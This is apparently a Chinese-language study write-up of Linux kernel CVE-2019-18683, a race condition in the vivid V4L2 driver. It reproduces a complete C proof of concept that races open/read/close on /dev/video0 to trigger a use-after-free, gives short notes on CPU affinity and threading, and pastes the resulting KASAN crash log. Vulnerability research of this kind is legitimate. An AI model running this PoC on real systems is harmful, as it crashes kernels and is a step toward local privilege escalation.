0%

cve-2019-18683

0x00 环境搭建

0x01 poc分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
/*
* PoC crashing the kernel using the bug in drivers/media/platform/vivid.
* Turned out that this bug is exploitable.
* Just for fun.
*/

#define _GNU_SOURCE

#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/mman.h>

#define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0)

#define THREADS_N 2
#define LOOP_N 10000

unsigned char *buf = NULL;

void *racer(void *arg)
{
unsigned long n = (unsigned long)arg;
unsigned long cpu_n = n % 2;
cpu_set_t single_cpu;
int ret = 0;
unsigned long loop = 0;

CPU_ZERO(&single_cpu);
CPU_SET(cpu_n, &single_cpu);
ret = sched_setaffinity(0, sizeof(single_cpu), &single_cpu);
if (ret != 0)
err_exit("[-] sched_setaffinity for a single CPU");

printf("[+] racer #%lu is on the start on CPU %lu\n", n, cpu_n);

for (loop = 0; loop < LOOP_N; loop++) {
int fd = 0;

/* printf(" racer %lu, loop %lu\n", n, loop); */

fd = open("/dev/video0", O_RDWR);
if (fd < 0)
err_exit("[-] open /dev/video0");

read(fd, buf, 0xfffded);
close(fd);

usleep(n);
}

return NULL;
}

int main(void)
{
int ret = -1;
cpu_set_t all_cpus;
pthread_t th[THREADS_N] = { 0 };
long i = 0;

printf("[!] gonna work with /dev/video0\n");
printf("[!] please check that:\n");
printf("\t vivid driver is loaded\n");
printf("\t /dev/video0 is the V4L2 capture device\n");
printf("\t you are logged in (Ubuntu adds RW ACL for /dev/video0)\n");

ret = sched_getaffinity(0, sizeof(all_cpus), &all_cpus);
if (ret != 0)
err_exit("[-] sched_getaffinity");

if (CPU_COUNT(&all_cpus) < 2) {
printf("[-] not enough CPUs for racing\n");
exit(EXIT_FAILURE);
}

printf("[+] we have %d CPUs for racing\n", CPU_COUNT(&all_cpus));
fflush(NULL);

buf = mmap(NULL, 0x1000000, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_ANONYMOUS, -1, 0);
if (buf == MAP_FAILED)
err_exit("[-] mmap");
else
printf("[+] buf for reading is mmaped at %p\n", buf);

for (i = 0; i < THREADS_N; i++) {
ret = pthread_create(&th[i], NULL, racer, (void *)i);
if (ret != 0)
err_exit("[-] pthread_create for racer");
}

for (i = 0; i < THREADS_N; i++) {
ret = pthread_join(th[i], NULL);
if (ret != 0)
err_exit("[-] pthread_join");
}

printf("[-] racing is failed, try it again\n");

exit(EXIT_FAILURE);
}

我们可以看到poc首先调用了sched_getaffinity() 函数,参考:

我们可以知道 sched_setaffinity() 是用来设置某一个进程运行在特定的cpu上, 用 sched_getaffinity() 函数来获取某一进程可以在那些cpu上运行,返回值 0为成功,-1为失败,利用这两个函数的话,更有利于gdb调试条件竞争的漏洞

之后调用CPU_COUNT()函数来获得当前进程可以运行的cpu的数量

之后调用 pthread_create() 函数来创建 THREADS_N 个线程,去运行racer函数,比较有意思的是,你创建的这个线程,是可以获取当前函数的局部变量的。。。

然后就是racer()函数,首先只用两个cpu,CPU_ZERO()函数是清空集合,CPU_SET()给定cpu号添加到集合里面,然后设置当前线程运行到特定的cpu上,然后for循环,一直open() read() close()然后再挂起一段时间。

0x02 漏洞分析

0x00 file_operations

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static const struct file_operations v4l2_fops = {
.owner = THIS_MODULE,
.read = v4l2_read,
.write = v4l2_write,
.open = v4l2_open,
.get_unmapped_area = v4l2_get_unmapped_area,
.mmap = v4l2_mmap,
.unlocked_ioctl = v4l2_ioctl,
#ifdef CONFIG_COMPAT
.compat_ioctl = v4l2_compat_ioctl32,
#endif
.release = v4l2_release,
.poll = v4l2_poll,
.llseek = no_llseek,
};

然后发现

1
2
3
4
loff_t no_llseek(struct file *file, loff_t offset, int whence)
{
return -ESPIPE;
}

0x03 运行poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
[   51.334790] ------------[ cut here ]------------
[ 51.335853] WARNING: CPU: 1 PID: 298 at drivers/media/common/videobuf2/videobuf2-core.c:1882 __vb2_queue_cancel.cold+0x11/0x212
[ 51.337830] Modules linked in:
[ 51.338383] CPU: 1 PID: 298 Comm: poc Not tainted 5.3.8 #3
[ 51.339360] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20191223_100556-anatol 04/01/2014
[ 51.341072] RIP: 0010:__vb2_queue_cancel.cold+0x11/0x212
[ 51.342023] Code: 50 a1 fe e9 6d ff ff ff e8 90 50 a1 fe e9 fc fe ff ff e8 86 50 a1 fe eb b5 e8 bf 7a 79 fe 48 c7 c7 20 46 20 84 e8 cc 11 64 fe <0f> 0b 8
[ 51.345211] RSP: 0018:ffff888064807cb8 EFLAGS: 00010282
[ 51.346130] RAX: 0000000000000024 RBX: 0000000000000001 RCX: 0000000000000000
[ 51.347365] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffffed100c900f89
[ 51.348611] RBP: ffff8880699963c4 R08: 0000000000000024 R09: ffffed100da25de0
[ 51.349843] R10: ffffed100da25ddf R11: ffff88806d12eeff R12: ffff888069996458
[ 51.351081] R13: ffff888069996460 R14: ffff888069996180 R15: ffff88806a254500
[ 51.352327] FS: 00007ff7ba809700(0000) GS:ffff88806d100000(0000) knlGS:0000000000000000
[ 51.353717] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 51.354714] CR2: 00007ff7ba808e78 CR3: 0000000069d96000 CR4: 00000000000006e0
[ 51.355949] Call Trace:
[ 51.356403] vb2_core_streamoff+0x59/0x140
[ 51.357150] __vb2_cleanup_fileio+0x70/0x160
[ 51.357905] vb2_core_queue_release+0x1a/0x70
[ 51.358679] _vb2_fop_release+0x1c1/0x280
[ 51.359397] vivid_fop_release+0x18b/0x430
[ 51.360131] ? vivid_dev_release+0x1b0/0x1b0
[ 51.360887] ? dev_debug_store+0x100/0x100
[ 51.361613] v4l2_release+0x2cc/0x370
[ 51.362278] ? dev_debug_store+0x100/0x100
[ 51.363009] __fput+0x2da/0x850
[ 51.363587] task_work_run+0x144/0x1c0
[ 51.364270] exit_to_usermode_loop+0x1d2/0x200
[ 51.365058] do_syscall_64+0x465/0x580
[ 51.365746] entry_SYSCALL_64_after_hwframe+0x49/0xbe
[ 51.366634] RIP: 0033:0x404ff1
[ 51.367187] Code: 75 14 b8 03 00 00 00 0f 05 48 3d 01 f0 ff ff 0f 83 34 5e 00 00 c3 48 83 ec 08 e8 6a fc ff ff 48 89 04 24 b8 03 00 00 00 0f 05 <48> 8b 1
[ 51.370438] RSP: 002b:00007ff7ba808d00 EFLAGS: 00000293 ORIG_RAX: 0000000000000003
[ 51.371782] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000404ff1
[ 51.373034] RDX: fffffffffffffff0 RSI: 00007ff7bb00b000 RDI: 0000000000000004
[ 51.374265] RBP: 00007ff7ba808dd0 R08: 0000000000000001 R09: 0000000000000026
[ 51.375473] R10: 0000000000000000 R11: 0000000000000293 R12: 00007ffd63d69cce
[ 51.376654] R13: 00007ffd63d69ccf R14: 00007ff7ba009000 R15: 0000000000000003
[ 51.377824] irq event stamp: 144
[ 51.378369] hardirqs last enabled at (143): [<ffffffff812892c8>] console_unlock+0x8f8/0xc40
[ 51.379723] hardirqs last disabled at (144): [<ffffffff8100430a>] trace_hardirqs_off_thunk+0x1a/0x20
[ 51.381148] softirqs last enabled at (140): [<ffffffff83c0065f>] __do_softirq+0x65f/0x924
[ 51.382441] softirqs last disabled at (133): [<ffffffff81159038>] irq_exit+0x178/0x1a0
[ 51.383683] ---[ end trace 9ff69050999e0cbd ]---
[ 51.384474] videobuf2_common: driver bug: stop_streaming operation is leaving buf 0000000026272a93 in active state
[ 51.387999] ==================================================================
[ 51.389187] BUG: KASAN: use-after-free in vid_cap_buf_queue+0x191/0x1c0
[ 51.390158] Write of size 8 at addr ffff88806a0b1a20 by task poc/298
[ 51.391125]
[ 51.391365] CPU: 1 PID: 298 Comm: poc Tainted: G W 5.3.8 #3
[ 51.392373] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20191223_100556-anatol 04/01/2014
[ 51.393745] Call Trace:
[ 51.394115] dump_stack+0xca/0x13e
[ 51.394614] print_address_description+0x62/0x31e
[ 51.395288] ? vid_cap_buf_queue+0x191/0x1c0
[ 51.395902] ? vid_cap_buf_queue+0x191/0x1c0
[ 51.396512] __kasan_report.cold+0x1a/0x40
[ 51.397099] ? vid_cap_buf_queue+0x191/0x1c0
[ 51.397711] kasan_report+0xe/0x12
[ 51.398192] vid_cap_buf_queue+0x191/0x1c0
[ 51.398789] ? vid_cap_buf_request_complete+0xa0/0xa0
[ 51.399492] __enqueue_in_driver+0x13f/0x390
[ 51.400081] vb2_start_streaming+0x62/0x2d0
[ 51.400658] vb2_core_streamon+0x1c5/0x2b0
[ 51.401225] __vb2_init_fileio+0x97d/0xba0
[ 51.401790] __vb2_perform_fileio+0xbab/0x10c0
[ 51.402421] ? fsnotify+0x786/0xb20
[ 51.402912] ? __fsnotify_parent+0xd1/0x370
[ 51.403493] ? vb2_thread_start+0x360/0x360
[ 51.404082] ? fsnotify_first_mark+0x200/0x200
[ 51.404704] vb2_fop_read+0x20e/0x400
[ 51.405220] v4l2_read+0x1f4/0x270
[ 51.405727] ? v4l2_write+0x270/0x270
[ 51.406234] __vfs_read+0x7c/0x100
[ 51.406712] vfs_read+0x1ef/0x430
[ 51.407202] ksys_read+0x127/0x250
[ 51.407673] ? kernel_write+0x120/0x120
[ 51.408221] ? __ia32_sys_nanosleep_time32+0x220/0x220
[ 51.408976] ? trace_hardirqs_off_caller+0x55/0x1e0
[ 51.409701] do_syscall_64+0xbd/0x580
[ 51.410290] entry_SYSCALL_64_after_hwframe+0x49/0xbe
[ 51.411076] RIP: 0033:0x404f91
[ 51.411562] Code: 75 14 b8 00 00 00 00 0f 05 48 3d 01 f0 ff ff 0f 83 94 5e 00 00 c3 48 83 ec 08 e8 ca fc ff ff 48 89 04 24 b8 00 00 00 00 0f 05 <48> 8b 1
[ 51.414332] RSP: 002b:00007ff7ba808d00 EFLAGS: 00000293 ORIG_RAX: 0000000000000000
[ 51.415492] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 0000000000404f91
[ 51.416578] RDX: 0000000000fffded RSI: 00007ff7bb00b000 RDI: 0000000000000003
[ 51.417686] RBP: 00007ff7ba808dd0 R08: 0000000000000001 R09: 0000000000000026
[ 51.418823] R10: 0000000000000000 R11: 0000000000000293 R12: 00007ffd63d69cce
[ 51.419919] R13: 00007ffd63d69ccf R14: 00007ff7ba009000 R15: 0000000000000003
[ 51.421030]
[ 51.421287] Allocated by task 297:
[ 51.421851] save_stack+0x1b/0x80
[ 51.422390] __kasan_kmalloc.constprop.0+0xc2/0xd0
[ 51.423155] __vb2_queue_alloc+0xe8/0xf20
[ 51.423816] vb2_core_reqbufs+0x495/0xcf0
[ 51.424455] __vb2_init_fileio+0x33b/0xba0
[ 51.425102] __vb2_perform_fileio+0xbab/0x10c0
[ 51.425812] vb2_fop_read+0x20e/0x400
[ 51.426394] v4l2_read+0x1f4/0x270
[ 51.426934] __vfs_read+0x7c/0x100
[ 51.427481] vfs_read+0x1ef/0x430
[ 51.428016] ksys_read+0x127/0x250
[ 51.428566] do_syscall_64+0xbd/0x580
[ 51.429150] entry_SYSCALL_64_after_hwframe+0x49/0xbe
[ 51.429930]
[ 51.430183] Freed by task 298:
[ 51.430674] save_stack+0x1b/0x80
[ 51.431191] __kasan_slab_free+0x12c/0x170
[ 51.431826] kfree+0xd2/0x2d0
[ 51.432308] __vb2_queue_free+0x501/0x870
[ 51.432941] vb2_core_reqbufs+0x212/0xcf0
[ 51.433571] __vb2_cleanup_fileio+0xed/0x160
[ 51.434241] vb2_core_queue_release+0x1a/0x70
[ 51.434920] _vb2_fop_release+0x1c1/0x280
[ 51.435579] vivid_fop_release+0x18b/0x430
[ 51.436223] v4l2_release+0x2cc/0x370
[ 51.436804] __fput+0x2da/0x850
[ 51.437306] task_work_run+0x144/0x1c0
[ 51.437897] exit_to_usermode_loop+0x1d2/0x200
[ 51.438609] do_syscall_64+0x465/0x580
[ 51.439206] entry_SYSCALL_64_after_hwframe+0x49/0xbe
[ 51.439991]
[ 51.440273] The buggy address belongs to the object at ffff88806a0b1680
[ 51.440273] which belongs to the cache kmalloc-1k of size 1024
[ 51.442207] The buggy address is located 928 bytes inside of
[ 51.442207] 1024-byte region [ffff88806a0b1680, ffff88806a0b1a80)
[ 51.443943] The buggy address belongs to the page:
[ 51.444675] page:ffffea0001a82c00 refcount:1 mapcount:0 mapping:ffff88806c802280 index:0x0 compound_mapcount: 0
[ 51.446186] flags: 0x100000000010200(slab|head)
[ 51.446870] raw: 0100000000010200 ffffea0001a75c00 0000000400000004 ffff88806c802280
[ 51.448026] raw: 0000000000000000 00000000800e000e 00000001ffffffff 0000000000000000
[ 51.449192] page dumped because: kasan: bad access detected
[ 51.450017]
[ 51.450262] Memory state around the buggy address:
[ 51.450990] ffff88806a0b1900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 51.452085] ffff88806a0b1980: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 51.453169] >ffff88806a0b1a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 51.454254] ^
[ 51.454907] ffff88806a0b1a80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 51.456007] ffff88806a0b1b00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 51.457111] ==================================================================
[ 51.458188] Disabling lock debugging due to kernel taint
[ 51.461635] BUG: kernel NULL pointer dereference, address: 0000000000000000
[ 51.462904] #PF: supervisor write access in kernel mode
[ 51.463887] #PF: error_code(0x0002) - not-present page
[ 51.464855] PGD 6a2d6067 P4D 6a2d6067 PUD 67a9f067 PMD 0
[ 51.465775] Oops: 0002 [#1] SMP KASAN NOPTI
[ 51.466412] CPU: 1 PID: 300 Comm: vivid-000-vid-c Tainted: G B W 5.3.8 #3
[ 51.467598] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20191223_100556-anatol 04/01/2014
[ 51.469075] RIP: 0010:memcpy_orig+0x29/0x110
[ 51.469734] Code: 00 48 89 f8 48 83 fa 20 72 7e 40 38 fe 7c 35 48 83 ea 20 48 83 ea 20 4c 8b 06 4c 8b 4e 08 4c 8b 56 10 4c 8b 5e 18 48 8d 76 20 <4c> 89 3
[ 51.472507] RSP: 0018:ffff888063d97930 EFLAGS: 00010206
[ 51.473327] RAX: 0000000000000000 RBX: dffffc0000000000 RCX: ffffffff82c3a4ac
[ 51.474474] RDX: 00000000000004c0 RSI: ffffc90000061020 RDI: 0000000000000000
[ 51.475585] RBP: ffffc90000061000 R08: 80b380b380b380b3 R09: 80b380b380b380b3
[ 51.476641] R10: 80b380b380b380b3 R11: 80b380b380b380b3 R12: ffffc90000061000
[ 51.477689] R13: 0000000000000500 R14: ffff888069995aa0 R15: ffffc90000061000
[ 51.478774] FS: 0000000000000000(0000) GS:ffff88806d100000(0000) knlGS:0000000000000000
[ 51.479959] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 51.480816] CR2: 0000000000000000 CR3: 0000000069d96000 CR4: 00000000000006e0
[ 51.481870] Call Trace:
[ 51.482264] tpg_fill_plane_buffer+0x1afc/0x2f90
[ 51.482963] vivid_fillbuff+0x1886/0x3d10
[ 51.483577] ? finish_task_switch+0x126/0x5f0
[ 51.484243] ? vivid_grab_controls+0x380/0x380
[ 51.484914] ? __mutex_lock+0x535/0x1300
[ 51.485509] ? lock_downgrade+0x720/0x720
[ 51.486108] ? lockdep_hardirqs_on+0x580/0x580
[ 51.486777] ? vivid_thread_vid_cap_tick+0xb9c/0x1f40
[ 51.487541] ? lock_downgrade+0x720/0x720
[ 51.488154] ? do_raw_spin_lock+0x11b/0x280
[ 51.488793] ? rwlock_bug.part.0+0x90/0x90
[ 51.489410] ? vivid_thread_vid_cap_tick+0x735/0x1f40
[ 51.490172] vivid_thread_vid_cap_tick+0x735/0x1f40
[ 51.490925] ? kvm_clock_get_cycles+0x14/0x20
[ 51.491580] vivid_thread_vid_cap+0x2f2/0x970
[ 51.492246] ? vivid_thread_vid_cap_tick+0x1f40/0x1f40
[ 51.493018] kthread+0x31b/0x420
[ 51.493512] ? kthread_create_on_node+0xf0/0xf0
[ 51.494191] ? kthread_create_on_node+0xf0/0xf0
[ 51.494866] ret_from_fork+0x27/0x50
[ 51.495411] Modules linked in:
[ 51.495879] CR2: 0000000000000000
[ 51.496387] ---[ end trace 9ff69050999e0cbe ]---
[ 51.497108] RIP: 0010:memcpy_orig+0x29/0x110
[ 51.497788] Code: 00 48 89 f8 48 83 fa 20 72 7e 40 38 fe 7c 35 48 83 ea 20 48 83 ea 20 4c 8b 06 4c 8b 4e 08 4c 8b 56 10 4c 8b 5e 18 48 8d 76 20 <4c> 89 3
[ 51.500647] RSP: 0018:ffff888063d97930 EFLAGS: 00010206
[ 51.501465] RAX: 0000000000000000 RBX: dffffc0000000000 RCX: ffffffff82c3a4ac
[ 51.502583] RDX: 00000000000004c0 RSI: ffffc90000061020 RDI: 0000000000000000
[ 51.503699] RBP: ffffc90000061000 R08: 80b380b380b380b3 R09: 80b380b380b380b3
[ 51.504801] R10: 80b380b380b380b3 R11: 80b380b380b380b3 R12: ffffc90000061000
[ 51.505922] R13: 0000000000000500 R14: ffff888069995aa0 R15: ffffc90000061000
[ 51.507044] FS: 0000000000000000(0000) GS:ffff88806d100000(0000) knlGS:0000000000000000
[ 51.508290] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 51.509187] CR2: 0000000000000000 CR3: 0000000069d96000 CR4: 00000000000006e0
[ 51.510296] BUG: sleeping function called from invalid context at include/linux/percpu-rwsem.h:38
[ 51.511667] in_atomic(): 0, irqs_disabled(): 1, pid: 300, name: vivid-000-vid-c
[ 51.512797] INFO: lockdep is turned off.
[ 51.513416] irq event stamp: 0
[ 51.513919] hardirqs last enabled at (0): [<0000000000000000>] 0x0
[ 51.514908] hardirqs last disabled at (0): [<ffffffff81137860>] copy_process+0x1550/0x6940
[ 51.516201] softirqs last enabled at (0): [<ffffffff81137901>] copy_process+0x15f1/0x6940
[ 51.517474] softirqs last disabled at (0): [<0000000000000000>] 0x0
[ 51.518447] CPU: 1 PID: 300 Comm: vivid-000-vid-c Tainted: G B D W 5.3.8 #3
[ 51.519688] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20191223_100556-anatol 04/01/2014
[ 51.521181] Call Trace:
[ 51.521584] dump_stack+0xca/0x13e
[ 51.522132] ___might_sleep.cold+0x10f/0x129
[ 51.522812] exit_signals+0x75/0x920
[ 51.523387] ? do_signal_stop+0x840/0x840
[ 51.524049] do_exit+0x28b/0x2b30
[ 51.524582] ? vivid_thread_vid_cap+0x2f2/0x970
[ 51.525299] ? mm_update_next_owner+0x630/0x630
[ 51.526029] ? vivid_thread_vid_cap_tick+0x1f40/0x1f40
[ 51.526843] ? kthread+0x31b/0x420
[ 51.527388] rewind_stack_do_exit+0x17/0x20